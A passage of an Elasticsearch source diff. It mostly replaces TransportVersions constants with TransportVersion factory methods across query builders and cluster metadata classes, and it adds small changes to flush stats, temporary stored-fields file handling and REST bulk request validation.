TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/MatchAllQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/MatchAllQueryBuilder.java index 70e417db54f28..79747acf3ea12 100644 --- a/server/src/main/java/org/elasticsearch/index/query/MatchAllQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/MatchAllQueryBuilder.java @@ -11,7 +11,6 @@ import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -85,6 +84,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/MatchBoolPrefixQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/MatchBoolPrefixQueryBuilder.java index 4ec6f870bf646..38a942be4942f 100644 --- a/server/src/main/java/org/elasticsearch/index/query/MatchBoolPrefixQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/MatchBoolPrefixQueryBuilder.java @@ -12,7 +12,6 @@ import org.apache.lucene.search.FuzzyQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; @@ -377,6 +376,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git 
a/server/src/main/java/org/elasticsearch/index/query/MatchNoneQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/MatchNoneQueryBuilder.java index 4dd926a1b9d39..42d948e7b0cef 100644 --- a/server/src/main/java/org/elasticsearch/index/query/MatchNoneQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/MatchNoneQueryBuilder.java @@ -117,6 +117,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/MatchPhrasePrefixQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/MatchPhrasePrefixQueryBuilder.java index 139d5c2c2a2e6..2e648652fab63 100644 --- a/server/src/main/java/org/elasticsearch/index/query/MatchPhrasePrefixQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/MatchPhrasePrefixQueryBuilder.java @@ -12,7 +12,6 @@ import org.apache.lucene.search.FuzzyQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -286,6 +285,6 @@ public static MatchPhrasePrefixQueryBuilder fromXContent(XContentParser parser) @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/MatchPhraseQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/MatchPhraseQueryBuilder.java index 86f5988135d79..f943df4b76810 100644 --- a/server/src/main/java/org/elasticsearch/index/query/MatchPhraseQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/MatchPhraseQueryBuilder.java @@ -12,7 +12,6 @@ import org.apache.lucene.analysis.core.KeywordAnalyzer; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; @@ -293,6 +292,6 @@ public static MatchPhraseQueryBuilder fromXContent(XContentParser parser) throws @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/MatchQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/MatchQueryBuilder.java index fd704d39ca384..56e002287e1e3 100644 --- a/server/src/main/java/org/elasticsearch/index/query/MatchQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/MatchQueryBuilder.java @@ -568,6 +568,6 @@ public static MatchQueryBuilder fromXContent(XContentParser parser) throws IOExc @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/MoreLikeThisQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/MoreLikeThisQueryBuilder.java index 54dab4f9716f0..4b2f4f2517622 100644 --- a/server/src/main/java/org/elasticsearch/index/query/MoreLikeThisQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/MoreLikeThisQueryBuilder.java @@ -1128,6 +1128,6 @@ 
protected QueryBuilder doRewrite(QueryRewriteContext queryRewriteContext) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/MultiMatchQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/MultiMatchQueryBuilder.java index cfd2fdcda853c..df7f28a7a15d5 100644 --- a/server/src/main/java/org/elasticsearch/index/query/MultiMatchQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/MultiMatchQueryBuilder.java @@ -823,6 +823,6 @@ protected boolean doEquals(MultiMatchQueryBuilder other) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/NestedQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/NestedQueryBuilder.java index 34c5ede62a656..2415db9348eac 100644 --- a/server/src/main/java/org/elasticsearch/index/query/NestedQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/NestedQueryBuilder.java @@ -26,7 +26,6 @@ import org.apache.lucene.search.join.ScoreMode; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.search.MaxScoreCollector; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; @@ -489,6 +488,6 @@ public TopDocsAndMaxScore topDocs(SearchHit hit) throws IOException { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/PrefixQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/PrefixQueryBuilder.java index 381245ab20974..9b5c72af97bc4 100644 --- a/server/src/main/java/org/elasticsearch/index/query/PrefixQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/PrefixQueryBuilder.java @@ -14,7 +14,6 @@ import org.apache.lucene.search.MultiTermQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; @@ -259,6 +258,6 @@ protected boolean doEquals(PrefixQueryBuilder other) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/QueryStringQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/QueryStringQueryBuilder.java index c4a7a8f57cef4..7efab50956cc2 100644 --- a/server/src/main/java/org/elasticsearch/index/query/QueryStringQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/QueryStringQueryBuilder.java @@ -14,7 +14,6 @@ import org.apache.lucene.search.Query; import org.apache.lucene.util.automaton.Operations; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -972,6 +971,6 @@ protected Query doToQuery(SearchExecutionContext context) throws IOException { @Override public 
TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/RangeQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/RangeQueryBuilder.java index d6dad15abb8e6..c1787cf0a84cc 100644 --- a/server/src/main/java/org/elasticsearch/index/query/RangeQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/RangeQueryBuilder.java @@ -13,7 +13,6 @@ import org.apache.lucene.search.Query; import org.apache.lucene.util.BytesRef; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; import org.elasticsearch.common.geo.ShapeRelation; @@ -558,6 +557,6 @@ protected boolean doEquals(RangeQueryBuilder other) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/RegexpQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/RegexpQueryBuilder.java index ff3d63d4c2549..1a0833693ad77 100644 --- a/server/src/main/java/org/elasticsearch/index/query/RegexpQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/RegexpQueryBuilder.java @@ -16,7 +16,6 @@ import org.apache.lucene.util.automaton.Operations; import org.apache.lucene.util.automaton.RegExp; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; @@ -321,6 +320,6 @@ protected boolean doEquals(RegexpQueryBuilder other) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/ScriptQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/ScriptQueryBuilder.java index 8d3fd1d92e1e7..faf01731947fe 100644 --- a/server/src/main/java/org/elasticsearch/index/query/ScriptQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/ScriptQueryBuilder.java @@ -23,7 +23,6 @@ import org.apache.lucene.search.Weight; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -229,6 +228,6 @@ protected boolean doEquals(ScriptQueryBuilder other) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/SimpleQueryStringBuilder.java b/server/src/main/java/org/elasticsearch/index/query/SimpleQueryStringBuilder.java index b366309be66bb..0421536a69a36 100644 --- a/server/src/main/java/org/elasticsearch/index/query/SimpleQueryStringBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/SimpleQueryStringBuilder.java @@ -633,6 +633,6 @@ protected boolean doEquals(SimpleQueryStringBuilder other) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git 
a/server/src/main/java/org/elasticsearch/index/query/SpanContainingQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/SpanContainingQueryBuilder.java index f146d9d4c860e..40210ef19ac64 100644 --- a/server/src/main/java/org/elasticsearch/index/query/SpanContainingQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/SpanContainingQueryBuilder.java @@ -13,7 +13,6 @@ import org.apache.lucene.queries.spans.SpanQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -168,6 +167,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/SpanFirstQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/SpanFirstQueryBuilder.java index 7d72649ff1080..42969e3991d44 100644 --- a/server/src/main/java/org/elasticsearch/index/query/SpanFirstQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/SpanFirstQueryBuilder.java @@ -13,7 +13,6 @@ import org.apache.lucene.queries.spans.SpanQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -163,6 +162,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/SpanMultiTermQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/SpanMultiTermQueryBuilder.java index 659f633aab286..2ee65be907e9e 100644 --- a/server/src/main/java/org/elasticsearch/index/query/SpanMultiTermQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/SpanMultiTermQueryBuilder.java @@ -16,7 +16,6 @@ import org.apache.lucene.search.Query; import org.apache.lucene.search.TopTermsRewrite; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -190,6 +189,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/SpanNearQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/SpanNearQueryBuilder.java index 458ff598737fa..f65ca20a96960 100644 --- a/server/src/main/java/org/elasticsearch/index/query/SpanNearQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/SpanNearQueryBuilder.java @@ -13,7 +13,6 @@ import org.apache.lucene.queries.spans.SpanQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; @@ -277,7 +276,7 @@ public 
String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } /** @@ -373,7 +372,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/index/query/SpanNotQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/SpanNotQueryBuilder.java index 007fa27bbf8fa..761484cd5cfc7 100644 --- a/server/src/main/java/org/elasticsearch/index/query/SpanNotQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/SpanNotQueryBuilder.java @@ -13,7 +13,6 @@ import org.apache.lucene.queries.spans.SpanQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -265,6 +264,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/SpanOrQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/SpanOrQueryBuilder.java index 09a4a56df6025..f56013b6570e8 100644 --- a/server/src/main/java/org/elasticsearch/index/query/SpanOrQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/SpanOrQueryBuilder.java @@ -13,7 +13,6 @@ import org.apache.lucene.queries.spans.SpanQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -168,6 +167,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/SpanTermQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/SpanTermQueryBuilder.java index 20874a736b1ec..c2b094325ae57 100644 --- a/server/src/main/java/org/elasticsearch/index/query/SpanTermQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/SpanTermQueryBuilder.java @@ -15,7 +15,6 @@ import org.apache.lucene.search.Query; import org.apache.lucene.search.QueryVisitor; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.index.mapper.MappedFieldType; @@ -160,6 +159,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/SpanWithinQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/SpanWithinQueryBuilder.java index bac7f5aeec226..9024b049f35bc 100644 --- a/server/src/main/java/org/elasticsearch/index/query/SpanWithinQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/SpanWithinQueryBuilder.java @@ -13,7 +13,6 @@ import 
org.apache.lucene.queries.spans.SpanWithinQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -177,6 +176,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/TermQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/TermQueryBuilder.java index 3b2a444e3fc7b..ccb7b0cc28c0b 100644 --- a/server/src/main/java/org/elasticsearch/index/query/TermQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/TermQueryBuilder.java @@ -13,7 +13,6 @@ import org.apache.lucene.search.MatchNoDocsQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -235,6 +234,6 @@ protected final boolean doEquals(TermQueryBuilder other) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/TermsQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/TermsQueryBuilder.java index dec4090a3e6bd..f0d1c08321bb2 100644 --- a/server/src/main/java/org/elasticsearch/index/query/TermsQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/TermsQueryBuilder.java @@ -14,7 +14,6 @@ import org.apache.lucene.search.Query; import org.apache.lucene.util.SetOnce; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.get.GetRequest; import org.elasticsearch.client.internal.Client; @@ -550,6 +549,6 @@ public int hashCode() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/TermsSetQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/TermsSetQueryBuilder.java index a6116ccf2c495..b12b417e24aa8 100644 --- a/server/src/main/java/org/elasticsearch/index/query/TermsSetQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/TermsSetQueryBuilder.java @@ -480,6 +480,6 @@ public LongValuesSource rewrite(IndexSearcher searcher) throws IOException { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/WildcardQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/WildcardQueryBuilder.java index fed6c3df15587..2d100efd7858f 100644 --- a/server/src/main/java/org/elasticsearch/index/query/WildcardQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/WildcardQueryBuilder.java @@ -56,6 +56,13 @@ public class WildcardQueryBuilder extends AbstractQueryBuilder inner @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff 
--git a/server/src/main/java/org/elasticsearch/index/query/functionscore/WeightBuilder.java b/server/src/main/java/org/elasticsearch/index/query/functionscore/WeightBuilder.java index 2c14f978a8b57..11fbcaf2c459c 100644 --- a/server/src/main/java/org/elasticsearch/index/query/functionscore/WeightBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/functionscore/WeightBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.index.query.functionscore; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.lucene.search.function.ScoreFunction; @@ -60,7 +59,7 @@ protected int doHashCode() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/index/shard/IndexShard.java b/server/src/main/java/org/elasticsearch/index/shard/IndexShard.java index 76ecd8141f79d..8dc7440c5dccf 100644 --- a/server/src/main/java/org/elasticsearch/index/shard/IndexShard.java +++ b/server/src/main/java/org/elasticsearch/index/shard/IndexShard.java @@ -1366,11 +1366,12 @@ public RefreshStats refreshStats() { } public FlushStats flushStats() { + final Engine engine = getEngineOrNull(); return new FlushStats( flushMetric.count(), periodicFlushMetric.count(), TimeUnit.NANOSECONDS.toMillis(flushMetric.sum()), - getEngineOrNull() != null ? getEngineOrNull().getTotalFlushTimeExcludingWaitingOnLockInMillis() : 0L + engine != null ? engine.getTotalFlushTimeExcludingWaitingOnLockInMillis() : 0L ); } diff --git a/server/src/main/java/org/elasticsearch/index/store/FsDirectoryFactory.java b/server/src/main/java/org/elasticsearch/index/store/FsDirectoryFactory.java index d4ec647b992b5..39a5c03e27942 100644 --- a/server/src/main/java/org/elasticsearch/index/store/FsDirectoryFactory.java +++ b/server/src/main/java/org/elasticsearch/index/store/FsDirectoryFactory.java @@ -46,7 +46,6 @@ public class FsDirectoryFactory implements IndexStorePlugin.DirectoryFactory { private static final Logger Log = LogManager.getLogger(FsDirectoryFactory.class); private static final FeatureFlag MADV_RANDOM_FEATURE_FLAG = new FeatureFlag("madv_random"); - private static final FeatureFlag TMP_FDT_NO_MMAP_FEATURE_FLAG = new FeatureFlag("tmp_fdt_no_mmap"); public static final Setting INDEX_LOCK_FACTOR_SETTING = new Setting<>("index.store.fs.fs_lock", "native", (s) -> { return switch (s) { @@ -261,8 +260,7 @@ static boolean useDelegate(String name, IOContext ioContext) { * @return whether to avoid using delegate if the file is a tmp fdt file. 
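* Avoiding the delegate routes these temporary stored-fields files through the NIOFS fallback instead of memory-mapping them; merge-time {@code .tmp} fdt files are written and read once, so mmapping them mostly churns the page cache (presumably the rationale for dropping the feature-flag gate below and making the behavior unconditional).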
*/ static boolean avoidDelegateForFdtTempFiles(String name, LuceneFilesExtensions extension) { - // NOTE, for now gated behind feature flag to observe impact of this change in benchmarks only: - return TMP_FDT_NO_MMAP_FEATURE_FLAG.isEnabled() && extension == LuceneFilesExtensions.TMP && name.contains("fdt"); + return extension == LuceneFilesExtensions.TMP && name.contains("fdt"); } MMapDirectory getDelegate() { diff --git a/server/src/main/java/org/elasticsearch/ingest/IngestMetadata.java b/server/src/main/java/org/elasticsearch/ingest/IngestMetadata.java index 325a6b22b62c7..9c0b1eb8ac505 100644 --- a/server/src/main/java/org/elasticsearch/ingest/IngestMetadata.java +++ b/server/src/main/java/org/elasticsearch/ingest/IngestMetadata.java @@ -10,7 +10,6 @@ package org.elasticsearch.ingest; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.Diff; import org.elasticsearch.cluster.DiffableUtils; import org.elasticsearch.cluster.NamedDiff; @@ -63,7 +62,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } public Map getPipelines() { @@ -150,7 +149,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } } diff --git a/server/src/main/java/org/elasticsearch/node/NodeServiceProvider.java b/server/src/main/java/org/elasticsearch/node/NodeServiceProvider.java index 53c26dc679677..ba1ca445642b6 100644 --- a/server/src/main/java/org/elasticsearch/node/NodeServiceProvider.java +++ b/server/src/main/java/org/elasticsearch/node/NodeServiceProvider.java @@ -116,7 +116,7 @@ TransportService newTransportService( TaskManager taskManager, Tracer tracer ) { - return new TransportService(settings, transport, threadPool, interceptor, localNodeFactory, clusterSettings, taskManager, tracer); + return new TransportService(settings, transport, threadPool, interceptor, localNodeFactory, clusterSettings, taskManager); } HttpServerTransport newHttpTransport(PluginsService pluginsService, NetworkModule networkModule) { diff --git a/server/src/main/java/org/elasticsearch/persistent/ClusterPersistentTasksCustomMetadata.java b/server/src/main/java/org/elasticsearch/persistent/ClusterPersistentTasksCustomMetadata.java index 03089cdff7cc2..e9a81d5baae66 100644 --- a/server/src/main/java/org/elasticsearch/persistent/ClusterPersistentTasksCustomMetadata.java +++ b/server/src/main/java/org/elasticsearch/persistent/ClusterPersistentTasksCustomMetadata.java @@ -10,7 +10,6 @@ package org.elasticsearch.persistent; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.AbstractNamedDiffable; import org.elasticsearch.cluster.ClusterState; import org.elasticsearch.cluster.NamedDiff; @@ -121,7 +120,7 @@ public String toString() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } @Override diff --git a/server/src/main/java/org/elasticsearch/persistent/PersistentTasksCustomMetadata.java b/server/src/main/java/org/elasticsearch/persistent/PersistentTasksCustomMetadata.java index 75ebc08004ddb..3e561432e139d 100644 --- a/server/src/main/java/org/elasticsearch/persistent/PersistentTasksCustomMetadata.java +++ 
b/server/src/main/java/org/elasticsearch/persistent/PersistentTasksCustomMetadata.java @@ -9,7 +9,6 @@ package org.elasticsearch.persistent; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.AbstractNamedDiffable; import org.elasticsearch.cluster.ClusterState; import org.elasticsearch.cluster.NamedDiff; @@ -110,7 +109,7 @@ public String toString() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } @Override diff --git a/server/src/main/java/org/elasticsearch/rest/RestRequest.java b/server/src/main/java/org/elasticsearch/rest/RestRequest.java index 54ad500a9144d..068d4879603e0 100644 --- a/server/src/main/java/org/elasticsearch/rest/RestRequest.java +++ b/server/src/main/java/org/elasticsearch/rest/RestRequest.java @@ -329,16 +329,20 @@ public HttpBody.Stream contentStream() { return httpRequest.body().asStream(); } - /** - * Returns reference to the network buffer of HTTP content or throws an exception if the body or content type is missing. - * See {@link #content()}. - */ - public ReleasableBytesReference requiredContent() { + public void ensureContent() { if (hasContent() == false) { throw new ElasticsearchParseException("request body is required"); } else if (xContentType.get() == null) { throwValidationException("unknown content type"); } + } + + /** + * Returns reference to the network buffer of HTTP content or throws an exception if the body or content type is missing. + * See {@link #content()}. + */ + public ReleasableBytesReference requiredContent() { + ensureContent(); return content(); } diff --git a/server/src/main/java/org/elasticsearch/rest/action/document/RestBulkAction.java b/server/src/main/java/org/elasticsearch/rest/action/document/RestBulkAction.java index f638367b85e76..293c8128dc8d9 100644 --- a/server/src/main/java/org/elasticsearch/rest/action/document/RestBulkAction.java +++ b/server/src/main/java/org/elasticsearch/rest/action/document/RestBulkAction.java @@ -137,6 +137,7 @@ public RestChannelConsumer prepareRequest(final RestRequest request, final NodeC client.bulk(bulkRequest, ActionListener.releaseAfter(new RestRefCountedChunkedToXContentListener<>(channel), content)); }; } else { + request.ensureContent(); String waitForActiveShards = request.param("wait_for_active_shards"); TimeValue timeout = request.paramAsTime("timeout", BulkShardRequest.DEFAULT_TIMEOUT); String refresh = request.param("refresh"); diff --git a/server/src/main/java/org/elasticsearch/rest/action/search/SearchCapabilities.java b/server/src/main/java/org/elasticsearch/rest/action/search/SearchCapabilities.java index ecbd092b455c7..5a8d462226008 100644 --- a/server/src/main/java/org/elasticsearch/rest/action/search/SearchCapabilities.java +++ b/server/src/main/java/org/elasticsearch/rest/action/search/SearchCapabilities.java @@ -33,6 +33,8 @@ private SearchCapabilities() {} private static final String TRANSFORM_RANK_RRF_TO_RETRIEVER = "transform_rank_rrf_to_retriever"; /** Support kql query. */ private static final String KQL_QUERY_SUPPORTED = "kql_query"; + private static final String KQL_QUERY_BOOLEAN_FIELD_QUERY_SUPPORTED = "kql_query_boolean_field_query"; + /** Support propagating nested retrievers' inner_hits to top-level compound retrievers.
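* (Like the other constants in this class, this capability string is advertised through the REST capabilities API, so clients and YAML tests can probe for support before relying on the behavior.)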
